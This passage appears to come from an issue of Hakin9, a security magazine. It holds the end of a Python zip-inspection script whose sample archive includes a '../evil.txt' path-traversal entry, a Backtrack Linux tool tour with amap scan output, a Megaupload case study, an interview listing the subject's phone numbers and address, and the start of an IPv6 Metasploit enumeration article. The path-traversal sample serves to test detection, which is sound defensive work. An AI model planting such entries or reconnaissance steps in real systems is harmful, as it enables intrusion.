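    """Constructed sample: three text files, like the article's three-text-files.zip,
    plus one entry whose name tries to climb out of the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("one.txt", "first text file\n")
        zf.writestr("two.txt", "second text file\n")
        zf.writestr("three.txt", "third text file\n")
        evil = zipfile.ZipInfo("../evil.txt")      # hostile name, constructed on purpose
        evil.compress_type = zipfile.ZIP_DEFLATED
        zf.writestr(evil, "hostile text file\n")
    return buf.getvalue()


def main():
    archive = mark_encrypted(build_sample_archive(), "two.txt")
    entries = inspect_zip(archive)
    for e in entries:
        print("%-12s %-8s %5d -> %5d  crc=%08x %s" % (
            e["name"], e["method"], e["compressed"], e["uncompressed"],
            e["crc32"], "encrypted" if e["encrypted"] else ""))
    for name, reason in risky_entries(entries):
        print("WARNING: %s: %s" % (name, reason))


if __name__ == "__main__":
    main()
```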


None of the commands in this article are mind blowing but, again, the point is to continue to beat it into everyone's mind that Backtrack is so much more than the couple hundred tools in the menu system. I mean, Linux is so much more in general, as it provides you the freedom to accomplish whatever it is you want to accomplish. Take the time to look around all of the Backtrack directories mentioned in this article and familiarize yourself with tools that you have never thought about using because you didn't know they existed, and it will take your "Linux Fu" to the next level. Let's move on to the /usr/sbin directory, as we still have numerous directories to get through, and I could likely babble about a single directory or a single command for longer than anyone would care to pay attention.

/usr/sbin – Non-essential system binaries
Examples – arp, cron, snort

The /usr/sbin directory is minimal when compared to /usr/bin on Backtrack Linux. Don't let that fool you, as it is just as important as the other directories mentioned in this article. One interesting tool in /usr/sbin is ntfsclone, which provides a method to generate an image file of an NTFS mount. While performing penetration testing, it is common to run across NTFS (New Technology File System) shares that have minimal or no security at all, which lets you mount the share without issue. As part of your deliverable to the client you could say: here is a thumb drive with an image file of the XyZ server's NTFS share. That is the type of data that proves success to clients. I mean, things can be explained to clients or screenshots taken and provided to clients, but nothing says "you are owned" quite like handing them a thumb drive with a single image file that contains all of their proprietary data. Another tool in /usr/sbin that I ran across for the first time while writing this article is laptop-detect, which is pretty interesting. All laptop-detect does is attempt to determine whether you are on a laptop or not. Say you have a goal of compromising a C-level executive's personal laptop; then you might get closer to your goal faster by using laptop-detect. Listing 5 shows example output of laptop-detect run from a desktop and then from a laptop. In that scenario laptop-detect was on the money. The amount of random scripts and goodies that are hidden all over Backtrack Linux never ceases to amaze me. While laptop-detect isn't anything to write home about in terms of complexity, it is pretty awesome that it even exists. Imagine if you were familiar with every tool located in Backtrack Linux? You might own the world by now!

Another really great tool in /usr/sbin is a firewall management tool called ufw. If you need to lock down Linux in less than 60 seconds, then ufw will provide what you need. By the way, those 60 seconds include typing "man ufw" and finding the examples you need to make packets disappear. With any firewall or firewall management tool you should be extremely careful when configuring things, because it's pretty easy to mess things up and end up locking yourself out. At that point, you will have such a secure server that you won't even be able to access your own data. So when I say sixty seconds I mean it; however, the point is that ufw is an amazing tool you don't hear enough about. Then take iptables, which is considered l337 (elite) and cool, yet if you were new to Linux it would require three bottles of aspirin just to read the man page. The ufw firewall management tool gives someone newer to firewalls, Linux, and technology a pretty solid solution with minimal ramp-up time. Check it out and then thank the Backtrack devs later for putting together an absolutely amazing collection of tools.

In the end, exploring Backtrack Linux directories has to beat watching reruns of Friends or that must-see football game, unless of course it's the other football and it's World Cup season. I mean, think if you spent all of your time learning versus deflating in front of the TV? You might accomplish things initially thought impossible. Again, I say to my friends I grew up with all the time that if I can even figure out how to log in to a computer, then the chances are that all of them could be writing exploits next week. A solid point made by exploring all of these directories, tools, commands, etc. is the fact that if you need to accomplish something, the chances are someone out there has needed to accomplish that same task before and the tool likely exists. It is always worth a quick search to verify you are not reinventing the wheel, and that rings especially true during penetration tests. The end goal is to accurately provide the client as much detail in terms of vulnerabilities or attack vectors as possible in what always seems too short of a time period. Do you think the client feels they are getting what they paid for when half of your time was spent writing a script to accomplish something already accomplished by someone else? How happy would that client be if that tool already existed and you just spent half the allotment of your billable time reinventing the wheel? The more time you familiarize yourself with the Backtrack command line, the more random gems will appear.

/usr/local/bin – local data – binaries specific to this host
Examples – None

A typical Linux installation likely wouldn't have any files in /usr/local/bin to begin with, as this is where command binaries specific to a particular installation are installed. The third-party applications or commands you install on top of the base Linux system would typically reside in /usr/local/bin. Backtrack Linux is a bit different because there are so many third-party tools installed by default. This is the default location for well-known tools such as hydra, nmap, and traceroute in Backtrack Linux. If you are not familiar with nmap and you work in Information Security, then I suggest you go purchase Gordon Fyodor Lyon's Nmap Network Scanning book, which is a steal for around $30. Read Nmap Network Scanning not once but twice and expand your horizons. Again though, when you look deeper and you start noticing tools that are not located in the Backtrack menu system or in the /pentest directory, you start finding all sorts of goodies. Take amap for example, which attempts to identify the applications that are running on various ports. Sure, there are other ways to accomplish this, but the more tools you possess at your fingertips, the quicker you will dominate the environments you roam. Check out the example in Listing 6, where I first moved the Apache web server on the localhost to port 53 to see how amap responded, which ended up being right on the money. Following this first example of amap, I show a scan against a Windows 2000 Server that has maybe a couple of open ports and likely some vulnerable services (Listing 6).

Listing 6. Application mapper amap issued from the Backtrack CLI

root@bt:~# amap localhost 53
amap v5.4 (www.thc.org/thc-amap) started at 2013-01-29 21:48:31 - APPLICATION MAPPING mode
Protocol on 127.0.0.1:53/tcp matches http
Protocol on 127.0.0.1:53/tcp matches http-apache-2
Unidentified ports: none.
amap v5.4 finished at 2013-01-29 21:48:37
root@bt:~#
root@bt:~# amap 192.168.1.119 22 25 135 139 445 1025 3389
amap v5.4 (www.thc.org/thc-amap) started at 2013-01-29 22:02:02 - APPLICATION MAPPING mode
Protocol on 192.168.1.119:139/tcp matches netbios-session
Protocol on 192.168.1.119:25/tcp matches smtp
Protocol on 192.168.1.119:445/tcp matches ms-ds
Protocol on 192.168.1.119:3389/tcp matches ms-remote-desktop-protocol
Protocol on 192.168.1.119:22/tcp matches ssh
Protocol on 192.168.1.119:22/tcp matches ssh-openssh
Protocol on 192.168.1.119:1025/tcp matches netbios-session
Protocol on 192.168.1.119:135/tcp matches netbios-session
Unidentified ports: none.
amap v5.4 finished at 2013-01-29 22:02:21
root@bt:~#

As you can see in Listing 6, amap isn't super fancy, but it provides another method to identify applications running on any port. I have seen amap get tripped up and return false negatives when too many ports are investigated at once, so if you get any port failures, run amap again with a single port that failed to make sure that you are not getting incorrect results. Another great tool in /usr/local/bin that isn't always mentioned is randpkt, which is a random packet generator.
Say you need to test an application like Wireshark by seeing how it reads specific types of malformed packets. Generate a pcap (Packet Capture) file in seconds using randpkt and open the pcap in Wireshark (Listing 7). Listing 7 shows a simple example of randpkt generating a pcap file with 1000 ARP packets.

Listing 7. Random packet generator randpkt generating a pcap file

root@bt:~# randpkt -t arp arp.pcap
root@bt:~#

The randpkt output isn't very exciting, but the contents of the pcap file it writes get me a little excited!

/usr/local/sbin – local data system binaries specific to this host
Examples – None

The /usr/local/sbin directory is similar to /usr/local/bin in the sense that this is where third-party applications you have installed will likely end up. Instead of command binaries like /usr/local/bin, the application daemons and such will be located in /usr/local/sbin. While there are under 100 applications in /usr/local/sbin by default in Backtrack, there are some great tools located here that are not detailed in the Backtrack menus. Many tools from the aircrack-ng suite are located in /usr/local/sbin, including aireplay-ng, airmon-ng, and airodump-ng. There are also a couple of really cool snarf-looking applications located in /usr/local/sbin, including filesnarf, urlsnarf, msgsnarf, and mailsnarf. I have all four on my list of command line tools I want to investigate more, as they will likely take some playing around with before they operate properly. I find myself modifying tools in Backtrack all the time and I encourage others to do the same. The golden rule is: before you start modifying things, just make sure that you have solid backups. Linux is an operating system platform that was made to be modified, broken, built on, etc., so don't be shy! Just make sure that you back things up, and also make sure you never take credit for something someone else accomplished before you. Take your time and be patient. Backtrack's motto states "when the going gets tough, try harder!" If you are like me, the passion will burn inside you and keep you up for days at a time. Explore every square inch of every operating system you can get your hands on. Just because you love Linux products doesn't mean that you have to hate Microsoft products or Apple products, because unfortunately, outside of the server market, the lion's share of business-related computers (specifically laptops/desktops) run on Windows, followed by OS X, followed by Linux. As far as Linux has come, it still has a ways to go, in my opinion, before you're going to catch the majority of average users popping open terminals. Think of the bright side of this: if you love Backtrack and familiarize yourself at a minimum with the directories listed in this article, you will likely be in the top 1% of computer users in the world.

This also brings up a great point about Backtrack and the fact that we are dealing with Open Source software, so don't expect everything to always simply work. All of these tools are free, and the Backtrack devs who pour the blood, sweat, and tears into Backtrack are much of the time doing so without pay. Please stop and think about that for a moment. Every single one of these tools has donated hours put into it, and putting all of these tools together has an entire second set of hours put into rounding them all up and doing an absolutely amazing job keeping things updated, providing support to the community, and really putting time back into InfoSec. I happen to be best friends with one of the Backtrack devs who goes by purehate, as we grew up in the same neighborhood in Louisville, KY, parted ways at one point fifteen years ago or so, and reconnected about 4 years ago only to find out that we were both pretty deep into InfoSec. The point there is the fact that I have witnessed firsthand the effort that Backtrack devs put into this operating system that we all use, and I just want to say loud and clear that when you see these guys, they deserve a thanks for building something that has made all of our lives easier. Buy these guys a meal, go out of your way to let them know that it's appreciated, or how about not just jumping down their throats on IRC or on the Backtrack message boards when something is wrong. I can promise you that none of them are getting rich off of providing us this free resource.

Alex Kah

Alex Kah is a member of the Accuvant LABS Enterprise Attack and Penetration Testing Team and has consulted on technologies ranging from various VoIP platforms to GPU rendering farms to auto-scaling, completely virtualized environments. Alex has over 15 years of experience in Information Technology working with industries including security, telecommunications, technology, gaming, healthcare, and media. Working out of his small Highlands office in Louisville, KY, USA, Alex also founded Question-Defense.com, an online collection of technical articles, and co-founded tools.question-defense.com (with Martin Bos), an automated online password cracking site. He holds a Bachelor's degree in Information Technology and a Master's degree in Business Administration along with various IT certifications. When he is not breaking things, he is, well, trying to fix them.



hakin9 OnDemand

The Rise and Fall of Megaupload.com and Kim Dotcom, and the Possible Implications for the Internet-based World of Piracy and Theft of Intellectual Property

In January 2012 the U.S. Government took down the Megaupload.com website and then quickly filed charges against the owner, Kim Dotcom, and his colleagues for alleged "copyright infringement, conspiracy to commit money laundering, racketeering, rewarding users who uploaded pirated content for sharing, and turning a blind eye to requests from copyright holders to remove copyright-protected files." Kim Dotcom and his colleagues were arrested a few hours later in New Zealand and await extradition to the U.S. to be tried for these charges. Conviction on these charges could result in severe fines and possibly many years in a U.S. Federal prison. This paper will discuss the rise and fall of Kim Dotcom and Megaupload.com and it will review how lawful governments may treat similar offenses in the future.

Less than 24 hours after the end of the global SOPA protest on the world wide web, on January 19, 2012, the governments of the U.S. and New Zealand acted swiftly to stop the Megaupload.com empire that Kim Dotcom had built. The U.S. Department of Justice shut down the Megaupload.com website and produced a 72-page federal indictment against Kim Dotcom, Megaupload.com, and several of the business partners for alleged "copyright infringement, conspiracy to commit money laundering, racketeering, rewarding users who uploaded pirated content for sharing, and turning a blind eye to requests from copyright holders to remove copyright-protected files." Almost 12,000 miles away, on January 20, 2012, New Zealand's law enforcement authorities were forcibly entering Mr. Dotcom's home, a leased luxury mansion in the serene New Zealand countryside, and forcing their way into a "safe room" where Mr. Dotcom was hiding with guns, cash, and his closest colleagues (Acohido, 2012). Mr. Kim Dotcom and his colleagues were then arrested and now await extradition to the U.S. to be tried for these charges. Conviction on these charges could result in severe fines and possibly many years of imprisonment in a U.S. Federal prison. This paper will discuss the rise and fall of Kim Dotcom and Megaupload.com and it will review how lawful governments may treat similar offenses in the future.

Originally Kim Schmitz, Mr. Dotcom, a native citizen of Germany, began his computer career in Germany in his early 20s in the early 1990s. He first began his career as a "computer expert" and then very shortly afterwards opened a computer security-related business. A short time later, Mr. Schmitz was indicted in Germany on computer fraud charges and later paid a fine and was released on probation. A few years later, Mr. Schmitz changed his name legally to "Kim Dotcom", perhaps as a prelude to starting the Megaupload.com business, and to position himself as a self-styled Internet mogul entrepreneur. Now as a 38-year-old German foreign national and temporary resident of New Zealand, at 6 feet 6 inches tall and over 285 pounds, Mr. Kim Dotcom is, both in stature and in his actions, a larger-than-life figure, who openly flaunted his wealth and his playboy lifestyle, the obvious results of the success of his Megaupload.com business (MikelVizualBazzikHck, 2012). With an annual income of more than $30 million, the flamboyant Mr. Dotcom could afford nearly everything he wanted, except permanent citizenship as a New Zealander. Yet after his arrest on January 20, 2012, he and his colleagues were incarcerated in a New Zealand jail, awaiting extradition to the U.S. to stand trial for the charges listed in their U.S. federal indictment (Acohido, 2012). However, Mr. Dotcom and his colleagues were initially denied the right to post bail to obtain temporary freedom because they were deemed by the local magistrate a "severe flight risk" due to the vast amount of wealth at their disposal.

At his arraignment on January 23, 2012, Mr. Dotcom and his codefendants audaciously denied all the charges in their indictment, claiming total innocence (Booth, 2012). At this moment, Mr. Dotcom, his fellow incarcerated colleagues, and their legal defense team are continuing to vigorously fight extradition on the grounds that the U.S. does not have the legal standing to indict them for the charges listed in the federal indictment. Nevertheless, the manner in which the authorities in New Zealand apprehended Mr. Dotcom and his colleagues while on New Zealand soil, while the United States was shutting down the Megaupload.com business website, could be a foreshadowing of how certain countries will treat others accused of software piracy and copyright infringement in the future. This trend could possibly occur with or without the passage of SOPA, PIPA, and/or federal legislation to protect the rights of intellectual property owners on the Internet. Indeed, this high-profile case of the demise of Mr. Dotcom, his colleagues and their Megaupload.com business shows the lengths to which the U.S. Government may be willing to go to shut down websites that promote software piracy, including producing detailed criminal indictments and incarcerating people, even if they are in foreign countries. Such actions may occur with or without the benefit of legislation such as SOPA or PIPA. Such actions are also very likely to have a chilling effect on rampant software piracy by international perpetrators, which had not been taken very seriously until these events (RT.com, 2012). Some legal experts have predicted that Mr. Dotcom and his colleagues will likely try to use the concept of "hacktivism" as a defense against the charges for which they are indicted (Bright, 2012). The idea behind "hacktivism" is that it could be construed to be an act protected by the First Amendment, because they may try to say they were exercising their rights of Free Speech as guaranteed by the First Amendment to the U.S. Constitution. Of course, the U.S. Government could easily argue that the First Amendment applies only to U.S. citizens and those living in the U.S., which would easily defeat the hacktivism-as-protected-Free-Speech argument. On February 16, 2012, the U.S. Department of Justice returned a superseding indictment against Kim Dotcom and his colleagues. The updated indictment was the result of additional investigation by the Department of Justice and it contained even more charges than the first indictment. The superseding indictment also shed additional light on how Megaupload.com was actually being used. The document provides additional details stating that Megaupload.com, which originally had claimed to have had more than 180 million registered users, actually had only 66.6 million users as of Jan. 19, 2012. Furthermore, the investigation also revealed that only 5.86 million of these users had ever uploaded a file to either Megaupload.com or Megavideo.com, prosecutors said (Halzack, 2012). On February 22, 2012, the New Zealand justice system finally permitted Kim Dotcom and his colleagues to post bail and gain provisional freedom while they wait to determine whether the U.S. Government will have them extradited to the U.S. to stand trial for the charges listed in the superseding indictment that was filed on February 16, 2012 (Tsukayama, 2012).

Conclusion

The strange, unfolding case of Mr. Dotcom and Megaupload.com, and all the circumstances surrounding the related actions of the governments of New Zealand and the United States, are certainly worthy of examination as a case study in a Cyberethics course. In addition, as more facts and events with multiple dimensions in ethics and law are revealed in this case, the outcome will likely shed additional light on some timely legal issues related to Internet-based software piracy, the theft of intellectual property, and how lawful governments will treat others who commit similar offenses in the future. Will the United States and other governments reach beyond their borders again to incarcerate and criminally try those they believe are guilty of Internet-related crimes such as software piracy and copyright violations? Only time will tell, but the implications of the U.S. Government's case against Mr. Dotcom and his colleagues will likely have far-reaching effects in the area of intellectual property, copyrights, software piracy, and the national and international laws related to these topics for many years to come.

References

• Acohido, B. (2012). Government takedown of Megaupload leads to new fears. USATODAY.com, January 20, 2012. Retrieved January 21, 2012 from http://www.usatoday.com/tech/news/story/2012-01-20/megaupload-arrests-FBI/52697186/1
• The American Dream. (2012). According To The FBI, Internet Privacy Is Now Considered To Be Suspicious Activity. endoftheamericandream.com. Retrieved February 4, 2012 from http://endoftheamericandream.com/archives/according-to-the-fbi-internet-privacy-is-now-considered-to-be-suspicious-activity
• Booth, R. (2012). Kim Dotcom Denies Internet Piracy. Guardian.co.uk, January 23, 2012. Retrieved January 23, 2012 from http://www.guardian.co.uk/technology/2012/jan/23/kim-dotcom-denies-internet-piracy
• Bright, A. (2012). Kim Dotcom: Are such Internet sensations pirates or hactivists? CSMONITOR.com. Retrieved February 5, 2012 from http://www.csmonitor.com/World/Global-Issues/2012/0125/Kim-Dotcom-Aresuch-Internet-sensations-pirates-or-hactivists/Kim-Dotcom
• Business Software Alliance. (2010). 2010 Piracy Impact Study: The Economic Benefits of Reducing Software Piracy. Retrieved February 5, 2012 from http://portal.bsa.org/piracyimpact2010/studies/piracyimpactstudy2010.pdf
• Business Software Alliance. (2009). 2009 Software Piracy on the Internet: A Threat To Your Security. Published at Wired.com. Retrieved February 5, 2012 from http://www.wired.com/images_blogs/threatlevel/2009/10/bsareport.pdf
• Flacy, M. (2012). Megaupload owner found hiding in safe room with sawed-off shotgun. Digitaltrends.com, January 21, 2012. Retrieved February 5, 2012 from http://www.digitaltrends.com/web/megauploadowner-found-hiding-in-safe-room-with-sawed-off-shotgun/
• Halzack, S. (2012). Megaupload indictment returned with charges added for Kim Dotcom and others. WashingtonPost.com, February 17, 2012. Retrieved February 20, 2012 from http://www.washingtonpost.com/business/economy/megaupload-indictment-returned-with-charges-added-for-kim-dotcom-and-others/2012/02/17/gIQAAXBNKR_story.html
• MikelVizualBazzikHck. (2012). MEGAUPLOAD: US Govt yet to present Evidence against Kim Dotcom (3 News). YouTube.com video. Retrieved January 30, 2012 from http://www.youtube.com/watch?v=7Fg7_f6-S0I&feature=related
• Neuman, J. (2009). Debunking BSA's piracy-malware link. MYCE.com, October 15, 2009. Retrieved February 5, 2012 from http://www.myce.com/news/debunking-bsas-piracy-malware-link-21041/
• Paoli, C. (2012). Anonymous Retaliates With Gov., Media Web Site Shutdowns After Megaupload Arrests. Redmondmag.com, January 19, 2012. Retrieved January 20, 2012 from http://redmondmag.com/articles/2012/01/19/anonymous-retaliates-after-megaupload-arrests.aspx
• RT.com. (2012). US courts already enforcing SOPA-style shut-downs. RT.com, December 20, 2011. Retrieved February 14, 2012 from http://rt.com/usa/news/us-court-sopa-morris-203/
• Ryan, J. (2012). Megaupload Back in High Tech Whack-a-mole. ABCNews.com. Retrieved January 20, 2012 from http://abcnews.go.com/Technology/megaupload-back-high-tech-whack-mole/story?id=15405292
• Tassi, P. (2012). You Will Never Kill Piracy, and Piracy Will Never Kill You. Forbes.com, February 3, 2012. Retrieved February 5, 2012 from http://www.forbes.com/sites/insertcoin/2012/02/03/you-will-never-kill-piracy-and-piracy-will-never-kill-you/
• Tsukayama, H. (2012). Report: Megaupload founder released on bail. WashingtonPost.com, February 22, 2012. Retrieved February 22, 2012 from http://www.washingtonpost.com/business/technology/reportmegaupload-founder-released-on-bail/2012/02/22/gIQA7hjBTR_story.html
• U.S. Department of Justice. (2012). Federal Indictment against Kim Dotcom, Megaupload.com, et al. Published at USATODAY.com, January 20, 2012. Retrieved January 21, 2012 from http://i.usatoday.net/tech/pdfs/12-0120-megaupload-indictment.pdf
• U.S. Department of Justice. (2012). The Superseding Federal Indictment Against Kim Dotcom, et al. Published at WashingtonPost.com, February 16, 2012. Retrieved February 22, 2012 from http://www.washingtonpost.com/wp-srv/business/documents/megaupload-indictment.pdf

William F. Slater, III

William F. Slater, III is an IT Security consultant who lives and works in Chicago, IL, United States of America. He has worked in Information Technology since 1977. In March 2013, he will complete his third graduate degree, an M.S. in Cybersecurity.


An Interview with William F. Slater, III

M.S. in Cybersecurity Program, Bellevue University, Bellevue, NE

Ewa Durnac: How was your article selected for publication by Hakin9?

William F. Slater, III: I was identified as a Cybersecurity professional who is also a writer back in October 2012. They contacted me via e-mail and asked me to start writing articles for Hakin9 magazine. I think that they found me either on LinkedIn.com or via a Google search. The January 2013 article was my fourth article with the magazine. The editors and publishers at Hakin9 magazine are also fun to work with and they seem to appreciate working with Cybersecurity professionals who can write and deliver articles that meet their quality standards as well as their publication submission deadlines.

ED: Was the article something that developed out of a class project?

WS: No. I was inspired to write it because I knew that applying the concepts described in the article would help make cyberspace a little safer. The article explains how using a well-designed security compliance framework can help an organization defend against the perils of cyberattacks and cyberwarfare. As far as I know, no one has yet been bold or knowledgeable enough to take the time to write such an article for the general public. Note that I did not receive any academic credit or even any compensation for writing this article.

ED: What led to your interest in Bellevue University’s Cybersecurity program?

WS: I was accepted into the M.S. in Cybersecurity program at Bellevue University on Friday, Aug. 26, 2011. I chose this program for two reasons: 1) you folks appear to really have your act together compared to everyone else; and 2) I hope to work at least another 20 years, and the Bellevue University M.S. in Cybersecurity program will equip me to accomplish some great things, including teaching and equipping the Cyberwarriors of America's future. I have been making a living in Information Technology since I started my service in the United States Air Force in July 1977. I served as a Computer System staff officer (AFSC 5135B) at Strategic Air Command Headquarters supporting the command control systems that provided command control and communications capability to SAC forces globally for the leadership of SAC and also the National Command Authorities. If you are interested in what I did at HQ SAC, there are several interesting pictures here: http://billslater.com/myusaf. After becoming ill in 1980, I left active duty in October 1980 and travelled to Houston, TX to begin my civilian career in IT. My career has involved many roles and many technologies over the years. You can see a synopsis of my career here: http://billslater.com/career and here: http://billslater.com/interview.

ED: What has been your impression of the program thus far?

WS: It's been very educational and VERY intense. I am completing my 11th and 12th classes in this program and it basically means that whenever school is in session, I have had no weekend time off since August 2011. Between work, teaching, and my M.S. and Cybersecurity course work, I have stayed extremely busy. It has been worth it, but I don't think people outside the program realize how hard the Bellevue University Cybersecurity students work to complete the assignments and keep their grades up. It is definitely the biggest challenge that I have had in academia. But, considering the importance of what we are learning and the overall high quality of the courses and the faculty, I would say that considering the price tag of the program it's a real bargain. I also admire Professor Woerner and Dr. Patrick for creating and administering this program. In the modern history of this country, the topic of understanding and protecting everything in cyberspace has never been more important than it is right now. The M.S. in Cybersecurity program at Bellevue University fills a special and critical niche in national security and in the private sector.

ED: Should I refer to you primarily as an IT consultant?

WS: Yes. I am a Senior IT Consultant.

ED: Do you have a primary employer I should refer to?

WS: I am the owner and head Sr. IT Consultant at Slater Technologies, Inc., and that is my own company, a Type "S" corporation.

ED: Also, what is your role at the Illinois Institute of Technology?

WS: I have been an adjunct professor at the Illinois Institute of Technology (IIT) for nearly five years. I teach the following classes at IIT:

• Data Center Architecture
• Data Center Management
• Introduction to Operating Systems and Hardware, Level I
• Introduction to Operating Systems Level II, with Linux, bash scripting and PERL Scripting
• Introduction to Java Programming and OO Application Development

Presently, I am teaching the following classes:

• Data Center Management
• Introduction to Operating Systems and Hardware, Level I
• Introduction to Java Programming and OO Application Development

ED: How has your education at Bellevue influenced how you teach?

WS: I have paid a great deal of time and attention to focusing on the Cybersecurity aspects of EVERYTHING I teach. Since most of my students are rather young and about to begin their careers, I have influenced them toward jobs and education in Cybersecurity. They are also impressed that a guy with well over three decades of IT experience would go back and work toward earning his third graduate degree, this time in Cybersecurity at Bellevue University online. My students are just beginning to wake up and realize that to work and thrive in the IT fields, it will mean a strong commitment toward a life-long education process. You can see a picture of me with my students at this link: http://on.fb.me/vfGRVi.

ED: How has your education impacted your work?

WS: My M.S. in Cybersecurity academic work and my career work have been extremely complementary to one another. My academic work, especially the research and writing, have helped me refine and maximize my professional strengths, making me a stronger, more confident Cybersecurity professional who can consistently add more value to his clients. Also, I have been able to use real-world examples to be a more effective Cybersecurity graduate student. Doing the challenging and rigorous academic work that complements my work experience and certifications has made me a more effective IT security professional. I believe also that it has made me more marketable in the workforce because this M.S. in Cybersecurity degree is still a rather new, rare, and elite thing. In 2013, I think that less than 200 people in the world have such a graduate degree.

ED: What are your plans following the completion of your Master’s degree?

WS: I plan to continue to do work in Cybersecurity, and to research, write, and teach. I think there are some things I can still create and write that will make cyberspace safer for all of us. I also plan to co-write with some of my students and also with other Cybersecurity professionals. In fact, I expect to be co-authoring one or two articles and presentations with Professor Woerner between now and the time I go through the June 2013 Bellevue Commencement Ceremony.

ED: Definitely feel free to add any additional comments that you would like.

WS: Behold, the Cyberwarrior I was, and still am:

• 1977
• 2013

[Photos: William F. Slater, III, 1977 and 2013]

Currently, I am a freelance Sr. IT Consultant and IT Project Manager. At this moment, I am actively engaged in working on and managing an exciting Fast-Track ISO 27001 Implementation Project. You can see other information about my career and things like certifications at this link: http://billslater.com/interview. I have been interested in IT security since my days in the USAF and actually wrote a graduate paper on the legal issues related to unauthorized computer access and S.B. 215 for a University of Nebraska at Lincoln Business Law class back in Fall 1979. Presently, my interests include the following:

• Data Centers (Architecture and Operations)
• Cyberwarfare and Cyberdeterrence
• Making Cyberspace safer for everyone
• Compliance
• Cloud Computing
• Programming (PERL, Java, C#, Python, Visual Basic, and C++)
• Security Automation using SCAP – the Security Content Automation Protocol
• Service Management
• Automation of mundane processes in IT to achieve increasingly greater efficiencies
• Pursuit of additional education and training that will lead to additional certifications in Cybersecurity and Information Technology

You can read some of my other writings and collections of resources at these links:

• http://billslater.com/writing
• http://billslater.com/iso27001

I am the most certified IT professional in the entire Midwest, if not the entire U.S. But I did not ask for, expect or receive any special treatment, and I did not ask to be credited for any of the security-related certifications that I have (CISSP, CISA, SSCP, etc.). I did all the coursework in this program the same as other students. You can view my M.S. in Cybersecurity program portfolio at this link: http://billslater.com/ms_cybersecurity. Thanks to Professor Woerner and Bellevue University for putting together this excellent Cybersecurity graduate program. I am greatly inspired by Professor Woerner and your contributions to this hugely important field of Cybersecurity.

ED: It would be helpful if you could send along a headshot and/or a shot of yourself at work or something along those lines.

WS: Any pictures from these links would be fine:

• http://sdrv.ms/UXWilC – general and portrait pictures
• http://on.fb.me/vfGRVi – pictures of me with my students

William Favre Slater, III
MBA, M.S., PMP, CISSP, SSCP, CISA, ISO 27002, ISO 20000, ITIL v3, IP v6, Cloud Computing Foundation
Project Manager / Program Manager
slater@billslater.com
williamslater@gmail.com
http://billslater.com/career
773 – 235 – 3080 – Home Office
312 – 758 – 0307 – Mobile
312 – 275 – 5757 – FAX
1337 N. Ashland Ave. No. 2
Chicago, IL 60622
United States of America

Ewa Durnac




Hakin9 Exploiting Software

How to Explore the IPv6 Attack Surface with Metasploit?

IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.

Earlier this year, the creators of the Metasploit Framework introduced support for IPv6, adding tools to allow attackers and defenders to explore this brave new world, and the increased attack surface it can offer. In this article we will introduce Metasploit’s three IPv6 enumeration modules, how to use them, and what they are doing “under the hood”. We’ll also cover the core IPv6 concepts that allow these modules to function as they do. Finally, we’ll take a look at configuring an IPv6 tunnel from a compromised host, to allow the use of a reverse connection IPv6 payload over the IPv6 Internet.

I find few commands as satisfying to execute as “msfupdate”. To many this may sound like a strange statement, but there are plenty of people who will completely understand where I’m coming from. Every time I enter “msfupdate”, I sit back in my chair and watch as my copy of the Metasploit Framework connects to the Metasploit servers and downloads the latest modules. I run that command at least daily, and every time I do, it always grabs me something new to dissect and work into my penetration-testing toolbox. I’m often surprised by the frequency and volume of some of the updates, but really I shouldn’t be. After all, the whole purpose of the Metasploit project is to provide a modular framework that allows exploits to be written in a standardized fashion to encourage community collaboration. Still, it’s refreshing to see that even after the project transitioned from a “pure” open source project to a commercially owned and operated one (Metasploit was acquired by Rapid 7 in 2009), the community is still contributing, and those contributions are still released under the original open-source license. According to Rapid 7, this will never change.

Earlier this year “msfupdate” fetched some updates that made me lean forward faster and look a little closer than perhaps I normally would. Metasploit downloaded a selection of modules with “IPv6” in the description. IPv6 has been creeping into our lives over the past several years. Our operating systems, network equipment and phones have been gradually adding support for the new version of the protocol that will keep future networks and the internet running when the current version of the internet protocol (IPv4) is finally retired due to address space exhaustion.

Figure 1. Typical output from “msfupdate” containing new additions and updates to existing

As you might expect, IPv6 offers some advantages over its predecessor. Primarily, the vast address space will ensure that theoretically every grain of sand on the planet could own an Internet connected device and not have to worry about hiding behind a NAT’ed IP. Additionally, IPv6 supports stateless auto-configuration – meaning that network administrators will no longer have to set up and manage DHCP servers, as IPv6 can “figure itself out” via the use of such mechanisms as neighbor discovery protocol messages sent via ICMP version 6. This is by no means an extensive list of differences, but I’d like to pause and consider the second “advantage” of IPv6 I’ve just mentioned from a security perspective. It’s this feature of IPv6 that the first batch of Metasploit IPv6 modules take advantage of.

One thing should be made very clear before we go any further. IPv6 is not any more or less secure than IPv4. They both do different things in different ways, and understanding the differences is key for network administrators to successfully implement the new protocol in a secure fashion. The biggest insecurity in IPv6 at the moment is that there are very few IPv6-only networks out there. 99% of the time you’ll find spots of IPv6 traffic wandering across the same wires as its older sibling, quietly going about its business. Similarly, 99% of the time you can ask a network administrator what they think that traffic is up to and they’ll reply with something along the lines of “erm, well that’s just noise, we don’t use IPv6 yet”. They likely aren’t doing anything with v6 just yet, but that doesn’t mean the devices sitting on the network aren’t. Out of the box, IPv6 is designed to “go find the quickest way to the Internet”. When you think of it like that, perhaps it’s time for network admins to “get all up” in IPv6’s business and see what it’s up to. After all, if devices are using it to communicate freely, then so can we.

Currently Metasploit features a handful of scanner modules for IPv6 discovery, and IPv6 enabled versions of its traditional payloads. A quick and easy way to locate the IPv6 modules is to run the command “search ipv6” from within the Metasploit Console (Figure 2). Let’s take a moment to dissect the scanner modules, and what we can learn from them.

Figure 2. Currently Metasploit offers three auxiliary scanner modules for IPv6 discovery and multiple payloads that run over IPv6

First up is “ipv6_multicast_ping”, written by wuntee. This module sends a number of ICMPv6 packets to the various IPv6 addresses that are defined as multicast addresses, to which all IPv6 enabled hosts should respond. Then it listens for the ICMPv6 echo-reply responses and records both the IPv6 address and the hardware (MAC) address of the responding host. Very quickly we can learn which hosts on our local network are IPv6 enabled. When configuring the module we have the option of specifying the source IPv6 address and source MAC. The only mandatory option is a timeout, which is set at 5 seconds by default (Figure 3).

Figure 3. Quickly locating nearby IPv6 enabled hosts with ipv6_multicast_ping

